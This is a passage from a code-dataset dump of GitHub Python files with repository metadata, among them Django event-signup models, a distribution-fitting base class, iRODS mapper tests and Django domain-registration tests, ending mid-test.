True\n\nprint(checkPrime(n))\n","repo_name":"therealyash/Coding-Programs","sub_path":"Coding Programs/Programs/Check Prime.py","file_name":"Check Prime.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31555740639","text":"# coding=utf-8\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.core.validators import MinValueValidator\nfrom django.template.defaultfilters import slugify\nfrom django.utils.translation import ugettext as _\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_delete\nimport django.utils.timezone as timezone\nfrom solo.models import SingletonModel\nimport events.register as eregister\nfrom users import permissions\nfrom base.fields import ValidatedRichTextField\nimport itertools\nimport logging\n\nfrom operator import attrgetter\n\n\nlogger = logging.getLogger(__name__)\n\nPERMISSION_CHOICES = (\n (eregister.CAN_VIEW_AND_JOIN_PUBLIC_EVENTS, \"Public event\"),\n (eregister.CAN_VIEW_AND_JOIN_MEMBER_EVENTS, \"Members-only event\"),\n (eregister.CAN_VIEW_AND_JOIN_BOARD_MEMBER_EVENTS, \"Board members-only 
event\"),\n)\n\n# This is used when the user has been adding event items to an event after signups has been made\nVALUE_DOES_NOT_EXIST = \"not_set\"\n\n\n# TODO if the field is a boolean, it should return False / True\n# TODO if the field is a integer or float, it should return appropriate type!\nclass MultiInputField(models.CharField):\n # In an ideal world this field would save different types of values and return the right python object\n # Sadly this seems rather impossible (at least as of Django 1.7)\n # hours_wasted_here = 3\n # Please increment counter as a warning to future programmers.\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n# This is an actual event, for example a Christmas party\nclass Event(models.Model):\n title = models.CharField(max_length=100)\n slug = models.SlugField(unique=True)\n text = ValidatedRichTextField(verbose_name=\"Description\")\n start = models.DateTimeField(verbose_name=\"Event ends\")\n stop = models.DateTimeField(verbose_name=\"Event starts\")\n author = models.ForeignKey(User)\n signup_start = models.DateTimeField(verbose_name=\"Signup starts\", default=timezone.now)\n signup_deadline = models.DateTimeField(verbose_name=\"Deadline for signups\")\n permission = models.CharField(max_length=100, choices=PERMISSION_CHOICES,\n default=eregister.CAN_VIEW_AND_JOIN_PUBLIC_EVENTS)\n max_participants = models.IntegerField(validators=[MinValueValidator(1)], default=50)\n use_captcha = models.BooleanField(default=False, verbose_name=\"Use captcha when anonymous people sign up\")\n send_email_for_reserves = models.BooleanField(\n default=True,\n verbose_name=\"Send email when someone is moved from reserve list to attending\"\n )\n allow_late_reserve_changes = models.BooleanField(\n default=True,\n verbose_name=\"Allow moving someone from reserve to attending when the event is about to start. \" +\n \"(set to 5 hours by default)\"\n )\n\n def __str__(self):\n return str(self.title)\n\n def get_absolute_url(self):\n return reverse(\"events_view_event\", kwargs={'slug': self.slug})\n\n def is_before_signup_start(self):\n return timezone.now() < self.signup_start\n\n def is_past_signup_deadline(self):\n return timezone.now() > self.signup_deadline\n\n # https://keyerror.com/blog/automatically-generating-unique-slugs-in-django\n def save(self, *args, **kwargs):\n if not self.id:\n # Newly created object, so set slug and ensure it is unique\n\n max_length = Event._meta.get_field('slug').max_length\n temp_slug = orig = slugify(self.title)[:max_length]\n for x in itertools.count(1):\n if not Event.objects.filter(slug=temp_slug).exists():\n break\n\n # Truncate the original slug dynamically. 
\n                # Truncate the original slug dynamically. Minus 1 for the hyphen.\n                temp_slug = \"%s-%d\" % (orig[:max_length - len(str(x)) - 1], x)\n\n            self.slug = temp_slug\n        super().save(*args, **kwargs)\n\n    @classmethod\n    def current_events(cls):\n        \"\"\"\n        Returns all events that haven't ended yet\n        :return:\n        \"\"\"\n        return cls.objects.filter(stop__gte=timezone.now())\n\n    def get_items(self):\n        return ItemInEvent.objects.filter(event=self).order_by('item__id')\n\n    def count_participants(self):\n        return EventSignup.objects.filter(event=self).count()\n\n    def user_can_view_and_join(self, user):\n        return permissions.has_user_perm(user, self.permission)\n\n    def fancy_daterange(self):\n        \"\"\"\n        Returns a nicer version of \"startdate - enddate\"\n        Example: instead of 22.2.2015 - 23.2.2015 this should return something like 22-23.2.2015\n        \"\"\"\n        if self.start.year == self.stop.year:\n            if self.start.month == self.stop.month:\n                if self.start.day == self.stop.day:\n                    return \"{0}.{1}.{2}\".format(self.stop.day, self.stop.month, self.stop.year)\n                return \"{0} - {1}.{2}.{3}\".format(self.start.day,\n                                                  self.stop.day, self.stop.month, self.stop.year)\n            return \"{0}.{1} - {2}.{3}.{4}\".format(self.start.day, self.start.month,\n                                                  self.stop.day, self.stop.month, self.stop.year)\n        # note: does the following ever make sense?\n        elif self.start.day == self.stop.day and self.start.month == self.stop.month:\n            return \"{0}.{1}.{2} - {3}\".format(self.start.day, self.start.month, self.start.year,\n                                              self.stop.year)\n\n        return \"{0}.{1}.{2} - {3}.{4}.{5}\".format(self.start.day, self.start.month, self.start.year,\n                                                  self.stop.day, self.stop.month, self.stop.year)\n\n    def get_summary(self):\n        if len(self.text) > 300:\n            summary = ValidatedRichTextField.get_summary(self.text, 300)\n            return \"%s<br><br>...<br><br>\" % summary\n        else:\n            return self.text\n\n    def is_late(self):\n        late_time = EventSettings.instance().late_signup_time_hours\n        late = self.start - timezone.now() < timezone.timedelta(hours=late_time)\n        return late\n\n    def can_reserve_person_attend(self):\n        \"\"\"\n        Checks if this event allows moving a person from the reserve list to attending right now\n        :return:\n        \"\"\"\n        too_late = self.is_late() and not self.allow_late_reserve_changes\n        already_started = self.start < timezone.now()\n        return self.send_email_for_reserves and not too_late and not already_started\n\n\n# Each user who signs up creates one of these.\n# We need both user and name because non-signed-in users can sign up too.\nclass EventSignup(models.Model):\n    event = models.ForeignKey(Event)\n    user = models.ForeignKey(User, blank=True, null=True)\n    name = models.CharField(max_length=100, verbose_name=\"Full name\")\n    email = models.EmailField()\n    created = models.DateTimeField(auto_now_add=True, blank=True)\n    auth_code = models.CharField(max_length=32, unique=True)  # Edit and delete for anonymous users\n    on_reserve_list = models.BooleanField(default=False)\n\n    class Meta:\n        ordering = \"created\",\n\n    def user_can_edit(self, user):\n        return self.user == user or permissions.has_user_perm(user, eregister.CAN_CREATE_EVENTS)\n\n    def __str__(self):\n        return \"{0}:{1} has signed up for {2}\".format(self.created, self.name, self.event)\n\n    def send_reserve_email(self, old_signup):\n        \"\"\"\n        Notify this signup that a spot has opened up\n        :param old_signup: The signup that was canceled\n        :return:\n        \"\"\"\n\n        context = Context({\n            'event': self.event,\n            'old_signup': old_signup,\n            'late': self.event.is_late()\n        })\n        template = get_template(\"events/emails/reserve_notify.html\")\n        message = template.render(context)\n        title = _(\"Reserve notification for\") + \" \" + self.event.title\n        from_email = settings.NO_REPLY_EMAIL\n        to_emails = [self.email]\n        send_mail(title, message, from_email, to_emails)\n\n    def build_email_content(self, request):\n        context = Context({\n            'request': request,\n            'event': self.event,\n            'signup': self,\n            'signup_edit_url':\n                request.build_absolute_uri(reverse(\"events_view_event_edit_signup_by_code\",\n                                                   kwargs={'event_id': self.event.id,\n                                                           'auth_code': self.auth_code})),\n            'signup_cancel_url':\n                request.build_absolute_uri(reverse(\"events_delete_event_signup_by_code\",\n                                                   kwargs={'auth_code': self.auth_code})),\n        })\n\n        template = get_template(\"events/emails/signup_email.html\")\n        return template.render(context)\n\n    def is_reserve(self):\n        return self.on_reserve_list\n\n    def get_items(self):\n        return ItemInSignup.objects.filter(signup=self).order_by('item__id')\n\n    # This function excludes items which have been removed from the event after the signup was made.\n    # It also adds \"missing\" items, which exist if event items were added after the signup was created.\n    def get_items_relevant(self):\n        # Only these items should be returned even if more are saved\n        items_in_event = ItemInEvent.objects.filter(event=self.event)\n        items_in_event_itemonly = ItemInEvent.objects.filter(event=self.event).values('item')\n\n        items_in_signup = ItemInSignup.objects.filter(signup=self) \\\n            .filter(item__in=items_in_event_itemonly).order_by('item__id')\n\n        items_in_signup_items = items_in_signup.values('item')\n        # Get all items which are configured for the event but are not in the signup\n        missing_items = items_in_event.exclude(item__in=items_in_signup_items)\n        result = list(items_in_signup)\n\n        # Add missing items\n        for item_in_event in missing_items:\n            fake_item_in_signup = ItemInSignup()\n            fake_item_in_signup.signup = self\n            fake_item_in_signup.value = VALUE_DOES_NOT_EXIST\n            fake_item_in_signup.item = item_in_event.item\n            result.append(fake_item_in_signup)\n\n        # Needs to be sorted to get in right column\n        result.sort(key=attrgetter('item.id'))\n        return result\n
\\\n filter(item__in=items_in_event_itemonly).order_by('item__id')\n\n items_in_signup_items = items_in_signup.values('item')\n # Get all items which are configured for event but is not in signup\n missing_items = items_in_event.exclude(item__in=items_in_signup_items)\n result = list(items_in_signup)\n\n # Add missing items\n for item_in_event in missing_items:\n fake_item_in_signup = ItemInSignup()\n fake_item_in_signup.signup_id = self\n fake_item_in_signup.value = VALUE_DOES_NOT_EXIST\n fake_item_in_signup.item = item_in_event.item\n result.append(fake_item_in_signup)\n\n # Needs to be sorted to get in right column\n result.sort(key=attrgetter('item.id'))\n return result\n\n\n@receiver(post_delete, sender=EventSignup, dispatch_uid=\"events_cancel_signup\")\ndef signups_cancel_signup(**kwargs):\n \"\"\"\n When a signup is canceled, check if there's anyone on the reserve list.\n :param kwargs:\n :return:\n \"\"\"\n instance = kwargs.pop(\"instance\")\n\n if instance.event.can_reserve_person_attend() and not instance.is_reserve():\n # Notify a user on the reserve list that they're in by email\n try:\n signups = EventSignup.objects.filter(event=instance.event, on_reserve_list=False)\n if signups.count() < instance.event.max_participants:\n # Get the signup that just got below the participant limit\n first_on_reserve = EventSignup.objects.filter(event=instance.event,\n on_reserve_list=True\n ).order_by(\"created\").first()\n first_on_reserve.send_reserve_email(instance)\n first_on_reserve.on_reserve_list = False\n first_on_reserve.save()\n except Exception as e:\n logger.error(\"Sending reserve email failed (%s)\", e)\n\n\nclass EventItem(models.Model):\n TYPE_BOOL = 'B'\n TYPE_STR = 'S'\n TYPE_TEXT = 'T'\n TYPE_INT = 'I'\n TYPE_CHOICE = 'C'\n TYPE_CHOICES = (\n (TYPE_BOOL, 'Checkbox'),\n (TYPE_STR, 'Text (one line)'),\n (TYPE_TEXT, 'Text (multiple lines)'),\n (TYPE_INT, 'Integer'),\n (TYPE_CHOICE, 'Choice'),\n )\n\n name = models.CharField(max_length=100)\n required = models.BooleanField(default=False, verbose_name=_(\"Is this field mandatory\"))\n public = models.BooleanField(default=False,\n verbose_name=_(\"Is this field shown to everyone?\",))\n hide_in_print_view = models.BooleanField(default=False,\n verbose_name=_(\"Is this field hidden from the print view?\",))\n type = models.CharField(\n max_length=1, choices=TYPE_CHOICES, default=TYPE_INT,\n verbose_name=\"Data type\",\n help_text=_(\"Decides what kind of data is allowed in this field. The options are:
\" +\n \"Checkbox: A simple checkbox (yes/no)
\" +\n \"Text (one line): A text field with one line
\" +\n \"Text (multiple lines): A larger resizeable text field that allows multiple lines
\" +\n \"Integer: A number
\" +\n \"Choice: A multiple-choices field. syntax for name: \" +\n \"question//alternative1//alternative2//alternative3\")\n )\n\n def __str__(self):\n return str(self.name)\n\n def get_name(self):\n if self.type == self.TYPE_CHOICE:\n return str(self.name.split(\"//\")[0])\n else:\n return str(self.name)\n\n\n# This is for setting which items can be set when signing up to event\nclass ItemInEvent(models.Model):\n event = models.ForeignKey(Event)\n item = models.ForeignKey(EventItem)\n\n def __str__(self):\n return str(\"{0} is enabled in {1}\".format(self.item.name, self.event.title))\n\n\n# This is for one specific signup\nclass ItemInSignup(models.Model):\n signup = models.ForeignKey(EventSignup)\n item = models.ForeignKey(EventItem)\n value = MultiInputField(max_length=500, null=True, blank=True)\n\n def __str__(self):\n return str(\"{0} signed up with {1}: {2}\".format(self.signup.name, self.item.name, self.get_value()))\n\n def get_value(self):\n if self.value == VALUE_DOES_NOT_EXIST:\n return _(\"(not set)\") # This string is shown for event items without a set value\n if self.value is None:\n return None\n if self.item.type in (EventItem.TYPE_CHOICE, EventItem.TYPE_STR, EventItem.TYPE_TEXT):\n return str(self.value)\n if self.item.type == EventItem.TYPE_BOOL:\n if self.value == \"True\":\n return True\n elif self.value == \"False\":\n return False\n else:\n raise TypeError()\n if self.item.type == EventItem.TYPE_INT:\n return int(self.value)\n else:\n raise NotImplementedError()\n\n\nclass EventSettings(SingletonModel):\n is_setup = models.BooleanField(default=False)\n # The amount of hours, before an event starts, that is considered late\n # This is used when deciding whether to tell people on the reserve list to print the notification email.\n late_signup_time_hours = models.IntegerField(default=5)\n\n @classmethod\n def instance(cls):\n instance, created = cls.objects.get_or_create()\n return instance\n\n","repo_name":"Lundis/SAW","sub_path":"studassweb/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5140454571","text":"#!/usr/bin/env python3\n\"\"\"Base class for theoretical distributions.\"\"\"\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass, astuple\nfrom enum import Enum, auto\nfrom logging import warning\n\nimport numpy as np\n\nfrom distribution.distribution import Distribution\nfrom distribution.empirical_distribution import EmpiricalDistribution\n\n\nclass TheoreticalDistribution(Distribution):\n \"\"\"Represents a theoretical degree distribution.\"\"\"\n\n class Type(Enum):\n \"\"\"Type of the theoretical distribution.\"\"\"\n\n UNIFORM: int = auto()\n POISSON: int = auto()\n POWER_LAW: int = auto()\n NORMAL: int = auto()\n STABLE: int = auto()\n INVALID: int = auto()\n\n @dataclass\n class Parameters:\n \"\"\"Represent the parameters of the distribution.\"\"\"\n\n @dataclass\n class FittingParameters:\n \"\"\"Parameters of how the fitting should be done.\"\"\"\n\n @dataclass\n class DomainCalculation:\n \"\"\"Parameters of domain calculation.\"\"\"\n\n @dataclass\n class ParameterFitting:\n \"\"\"Parameters of domain calculation.\"\"\"\n\n domain_calculation: DomainCalculation\n parameter_fitting: ParameterFitting\n\n def __init__(self) -> None:\n \"\"\"Create a default theoretical distribution.\"\"\"\n super().__init__()\n self._parameters = TheoreticalDistribution.Parameters()\n\n def fit(self, 
empirical_distribution: EmpiricalDistribution, fitting_parameters: FittingParameters) -> None:\n \"\"\"Fit the parameters of the probability distribution.\"\"\"\n if len(empirical_distribution.value_sequence) < 2:\n warning(\n f'Empirical degree distribution contains {len(empirical_distribution.value_sequence)} in the domain.')\n self._valid = False # pylint: disable=attribute-defined-outside-init\n return\n\n self._fit_domain(empirical_distribution, fitting_parameters.domain_calculation)\n if not self.domain.valid:\n return\n\n self._fit_parameters(empirical_distribution, fitting_parameters.parameter_fitting)\n self._valid = not any( # pylint: disable=attribute-defined-outside-init\n np.isnan(x)\n for x in astuple(self._parameters)\n ) and self.domain.valid\n\n def _fit_domain(\n self,\n empirical_distribution: EmpiricalDistribution,\n domain_calculation_parameters: FittingParameters.DomainCalculation,\n ) -> None:\n raise NotImplementedError\n\n def _fit_parameters(\n self,\n empirical_distribution: EmpiricalDistribution,\n parameter_fitting_parameters: FittingParameters.ParameterFitting,\n ) -> None:\n raise NotImplementedError\n\n @property\n def parameters(self) -> Parameters:\n \"\"\"Return the parameters of the distribution.\"\"\"\n return self._parameters\n","repo_name":"shepherd92/network_simulator","sub_path":"distribution/theoretical/theoretical_distribution.py","file_name":"theoretical_distribution.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1500314288","text":"import os,sys\nimport os.path\nfrom os import path\nfrom CustomisedFileOperation import * \n\nif __name__==\"__main__\":\n\tinput_directory=sys.argv[1]\n\tfor root, dirs, files in os.walk(input_directory):\n\t\tcount=0\n\t\tfor each_file in files:\n\t\t\tcount+=1\n\t\t\ttemp_file=str(each_file)+'\\n'\n\t\t\tprint (count,each_file)\n\t\t\twrite_into_file(file_name='file_names.txt',contents=temp_file,mode='a')\n\t\tbreak\t\t\n","repo_name":"infotechaji/GeneralCodes","sub_path":"SQL_automation/StubAddition/FileNameExtraction.py","file_name":"FileNameExtraction.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"39636898760","text":"import logging\nimport math\nimport unittest\nfrom datetime import datetime\nfrom os.path import join\n\nfrom testwithirods.helpers import SetupHelper\n\nfrom baton.collections import DataObjectReplicaCollection, IrodsMetadata\nfrom baton.models import DataObjectReplica\nfrom cookiemonster.retriever.source.irods._constants import MODIFIED_METADATA_QUERY_ALIAS\nfrom cookiemonster.retriever.source.irods.baton_mappers import BatonUpdateMapper, MODIFIED_DATA_QUERY_ALIAS\nfrom cookiemonster.retriever.source.irods.json_convert import DataObjectModificationJSONEncoder\nfrom cookiemonster.retriever.source.irods.models import DataObjectModification\nfrom cookiemonster.tests.retriever.source.irods._helpers import install_queries\nfrom cookiemonster.tests.retriever.source.irods._settings import BATON_SETUP\nfrom hgicommon.collections import Metadata\nfrom testwithbaton.api import TestWithBaton\n\nREQUIRED_SPECIFIC_QUERIES = {\n MODIFIED_DATA_QUERY_ALIAS: join(\"resources\", \"specific-queries\", \"data-modified-partial.sql\"),\n MODIFIED_METADATA_QUERY_ALIAS: join(\"resources\", \"specific-queries\", \"metadata-modified-partial.sql\")\n}\n\n_DATA_OBJECT_NAMES = [\"data_object_1\", 
\"data_object_2\"]\n_METADATA_KEYS = [\"key_1\", \"key_2\"]\n_METADATA_VALUES = [\"value_1\", \"value_2\", \"value_2\"]\n\n_MAX_IRODS_TIMESTAMP = int(math.pow(2, 31)) - 1\n\n\nclass TestBatonUpdateMapper(unittest.TestCase):\n \"\"\"\n Tests for `BatonUpdateMapper`.\n \"\"\"\n def setUp(self):\n self.test_with_baton = TestWithBaton(baton_setup=BATON_SETUP)\n self.test_with_baton.setup()\n self.setup_helper = SetupHelper(self.test_with_baton.icommands_location)\n install_queries(REQUIRED_SPECIFIC_QUERIES, self.setup_helper)\n\n zone = self.test_with_baton.irods_server.users[0].zone\n self.mapper = BatonUpdateMapper(self.test_with_baton.baton_location, zone)\n\n def test_get_all_since_with_date_in_future(self):\n updates = self.mapper.get_all_since(datetime.fromtimestamp(_MAX_IRODS_TIMESTAMP))\n self.assertEqual(len(updates), 0)\n\n def test_get_all_since_with_date_in_past(self):\n start_timestamp = self._get_latest_update_timestamp()\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEqual(len(updates), 0)\n\n def test_get_all_since_with_data_object_updates(self):\n start_timestamp = self._get_latest_update_timestamp()\n location_1 = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[0])\n location_2 = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[1])\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEqual(len(updates), 2)\n self.assertEqual(len(updates.get_entity_updates(location_1)), 1)\n self.assertEqual(len(updates.get_entity_updates(location_2)), 1)\n # TODO: More detailed check on updates\n\n def test_get_all_since_with_updates_to_data_object_replica(self):\n start_timestamp = self._get_latest_update_timestamp()\n location = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[0])\n resource = self.setup_helper.create_replica_storage()\n self.setup_helper.replicate_data_object(location, resource)\n self.setup_helper.update_checksums(location)\n\n checksum = self.setup_helper.get_checksum(location)\n replicas = DataObjectReplicaCollection([DataObjectReplica(i, checksum) for i in range(2)])\n expected_modification = DataObjectModification(modified_replicas=replicas)\n expected_metadata = Metadata(DataObjectModificationJSONEncoder().default(expected_modification))\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEquals(len(updates), 1)\n self.assertIn(updates[0].target, location)\n self.assertCountEqual(updates[0].metadata, expected_metadata)\n\n def test_get_all_since_with_metadata_update(self):\n path = self.setup_helper.create_data_object(_DATA_OBJECT_NAMES[0])\n start_timestamp = self._get_latest_update_timestamp()\n\n metadata_1 = Metadata({\n _METADATA_KEYS[0]: _METADATA_VALUES[0],\n _METADATA_KEYS[1]: _METADATA_VALUES[1]\n })\n self.setup_helper.add_metadata_to(path, metadata_1)\n # Update pre-existing metadata item\n metadata_2 = Metadata({_METADATA_KEYS[0]: _METADATA_VALUES[2]})\n self.setup_helper.add_metadata_to(path, metadata_2)\n expected_irods_metadata = IrodsMetadata({\n _METADATA_KEYS[0]: {_METADATA_VALUES[0], _METADATA_VALUES[2]},\n _METADATA_KEYS[1]: {_METADATA_VALUES[1]}\n })\n\n modification = DataObjectModification(modified_metadata=expected_irods_metadata)\n expected_update_metadata = Metadata(DataObjectModificationJSONEncoder().default(modification))\n\n updates = self.mapper.get_all_since(start_timestamp)\n self.assertEqual(len(updates), 1)\n relevant_updates = updates.get_entity_updates(path)\n # Expect the mapper to have combined all updates into one 
(https://github.com/wtsi-hgi/cookie-monster/issues/3)\n self.assertEqual(len(relevant_updates), 1)\n self.assertEqual(relevant_updates[0].target, path)\n logging.debug(relevant_updates[0].metadata)\n logging.debug(expected_update_metadata)\n self.assertCountEqual(relevant_updates[0].metadata, expected_update_metadata)\n\n def _get_latest_update_timestamp(self) -> datetime:\n \"\"\"\n Gets the timestamp of the latest update. If there has been no updates, returns minimum timestamp.\n\n This timestamp is useful to get before running a test for use in filtering out any updates that iRODS\n already has. The Dockerized iRODS 3.3.1, for example, will have updates on start.\n :return: timestamp of latest update\n \"\"\"\n inital_updates = self.mapper.get_all_since(datetime.min)\n if len(inital_updates) == 0:\n return datetime.min\n return inital_updates.get_most_recent()[0].timestamp\n\n def tearDown(self):\n self.test_with_baton.tear_down()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"wtsi-hgi/cookie-monster","sub_path":"cookiemonster/tests/retriever/source/irods/test_baton_mappers.py","file_name":"test_baton_mappers.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6206154562","text":"from unittest import skip\nfrom unittest.mock import MagicMock, ANY, patch\n\nfrom django.conf import settings\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\nfrom .common import MockEppLib, completed_application, create_user # type: ignore\n\nfrom django_webtest import WebTest # type: ignore\nimport boto3_mocking # type: ignore\n\nfrom registrar.utility.errors import (\n NameserverError,\n NameserverErrorCodes,\n SecurityEmailError,\n SecurityEmailErrorCodes,\n GenericError,\n GenericErrorCodes,\n DsDataError,\n DsDataErrorCodes,\n)\n\nfrom registrar.models import (\n DomainApplication,\n Domain,\n DomainInformation,\n DraftDomain,\n DomainInvitation,\n Contact,\n PublicContact,\n Website,\n UserDomainRole,\n User,\n)\nfrom registrar.views.application import ApplicationWizard, Step\n\nfrom .common import less_console_noise\n\n\nclass TestViews(TestCase):\n def setUp(self):\n self.client = Client()\n\n def test_health_check_endpoint(self):\n response = self.client.get(\"/health/\")\n self.assertContains(response, \"OK\", status_code=200)\n\n def test_home_page(self):\n \"\"\"Home page should NOT be available without a login.\"\"\"\n response = self.client.get(\"/\")\n self.assertEqual(response.status_code, 302)\n\n def test_application_form_not_logged_in(self):\n \"\"\"Application form not accessible without a logged-in user.\"\"\"\n response = self.client.get(\"/register/\")\n self.assertEqual(response.status_code, 302)\n self.assertIn(\"/login?next=/register/\", response.headers[\"Location\"])\n\n\nclass TestWithUser(MockEppLib):\n def setUp(self):\n super().setUp()\n username = \"test_user\"\n first_name = \"First\"\n last_name = \"Last\"\n email = \"info@example.com\"\n self.user = get_user_model().objects.create(\n username=username, first_name=first_name, last_name=last_name, email=email\n )\n\n def tearDown(self):\n # delete any applications too\n super().tearDown()\n DomainApplication.objects.all().delete()\n self.user.delete()\n\n\nclass LoggedInTests(TestWithUser):\n def setUp(self):\n super().setUp()\n self.client.force_login(self.user)\n\n def test_home_lists_domain_applications(self):\n response = 
self.client.get(\"/\")\n self.assertNotContains(response, \"igorville.gov\")\n site = DraftDomain.objects.create(name=\"igorville.gov\")\n application = DomainApplication.objects.create(creator=self.user, requested_domain=site)\n response = self.client.get(\"/\")\n # count = 2 because it is also in screenreader content\n self.assertContains(response, \"igorville.gov\", count=2)\n # clean up\n application.delete()\n\n def test_home_lists_domains(self):\n response = self.client.get(\"/\")\n domain, _ = Domain.objects.get_or_create(name=\"igorville.gov\")\n self.assertNotContains(response, \"igorville.gov\")\n role, _ = UserDomainRole.objects.get_or_create(user=self.user, domain=domain, role=UserDomainRole.Roles.MANAGER)\n response = self.client.get(\"/\")\n # count = 2 because it is also in screenreader content\n self.assertContains(response, \"igorville.gov\", count=2)\n self.assertContains(response, \"DNS needed\")\n # clean up\n role.delete()\n\n def test_application_form_view(self):\n response = self.client.get(\"/register/\", follow=True)\n self.assertContains(\n response,\n \"What kind of U.S.-based government organization do you represent?\",\n )\n\n def test_domain_application_form_with_ineligible_user(self):\n \"\"\"Application form not accessible for an ineligible user.\n This test should be solid enough since all application wizard\n views share the same permissions class\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n\n with less_console_noise():\n response = self.client.get(\"/register/\", follow=True)\n print(response.status_code)\n self.assertEqual(response.status_code, 403)\n\n\nclass DomainApplicationTests(TestWithUser, WebTest):\n\n \"\"\"Webtests for domain application to test filling and submitting.\"\"\"\n\n # Doesn't work with CSRF checking\n # hypothesis is that CSRF_USE_SESSIONS is incompatible with WebTest\n csrf_checks = False\n\n def setUp(self):\n super().setUp()\n self.app.set_user(self.user.username)\n self.TITLES = ApplicationWizard.TITLES\n\n def test_application_form_empty_submit(self):\n # 302 redirect to the first form\n page = self.app.get(reverse(\"application:\")).follow()\n # submitting should get back the same page if the required field is empty\n result = page.forms[0].submit()\n self.assertIn(\"What kind of U.S.-based government organization do you represent?\", result)\n\n def test_application_multiple_applications_exist(self):\n \"\"\"Test that an info message appears when user has multiple applications already\"\"\"\n # create and submit an application\n application = completed_application(user=self.user)\n application.submit()\n application.save()\n\n # now, attempt to create another one\n with less_console_noise():\n page = self.app.get(\"/register/\").follow()\n self.assertContains(page, \"You cannot submit this request yet\")\n\n @boto3_mocking.patching\n def test_application_form_submission(self):\n \"\"\"\n Can fill out the entire form and submit.\n As we add additional form pages, we need to include them here to make\n this test work.\n\n This test also looks for the long organization name on the summary page.\n\n This also tests for the presence of a modal trigger and the dynamic test\n in the modal header on the submit page.\n \"\"\"\n num_pages_tested = 0\n # elections, type_of_work, tribal_government, no_other_contacts\n SKIPPED_PAGES = 4\n num_pages = len(self.TITLES) - SKIPPED_PAGES\n\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it 
keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n # ---- TYPE PAGE ----\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n # test next button and validate data\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n # should see results in db\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.organization_type, \"federal\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(type_result.status_code, 302)\n self.assertEqual(type_result[\"Location\"], \"/register/organization_federal/\")\n num_pages_tested += 1\n\n # ---- FEDERAL BRANCH PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n\n federal_page = type_result.follow()\n federal_form = federal_page.forms[0]\n federal_form[\"organization_federal-federal_type\"] = \"executive\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.federal_type, \"executive\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(federal_result.status_code, 302)\n self.assertEqual(federal_result[\"Location\"], \"/register/organization_contact/\")\n num_pages_tested += 1\n\n # ---- ORG CONTACT PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_page = federal_result.follow()\n org_contact_form = org_contact_page.forms[0]\n # federal agency so we have to fill in federal_agency\n org_contact_form[\"organization_contact-federal_agency\"] = \"General Services Administration\"\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-address_line2\"] = \"address 2\"\n org_contact_form[\"organization_contact-city\"] = \"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n org_contact_form[\"organization_contact-urbanization\"] = \"URB Royal Oaks\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_result = org_contact_form.submit()\n # validate that data from this step are being saved\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(application.organization_name, \"Testorg\")\n self.assertEqual(application.address_line1, \"address 1\")\n self.assertEqual(application.address_line2, \"address 2\")\n self.assertEqual(application.city, \"NYC\")\n self.assertEqual(application.state_territory, \"NY\")\n self.assertEqual(application.zipcode, \"10002\")\n self.assertEqual(application.urbanization, \"URB Royal Oaks\")\n # the post request should return a redirect to the next form in\n # the application\n self.assertEqual(org_contact_result.status_code, 302)\n self.assertEqual(org_contact_result[\"Location\"], 
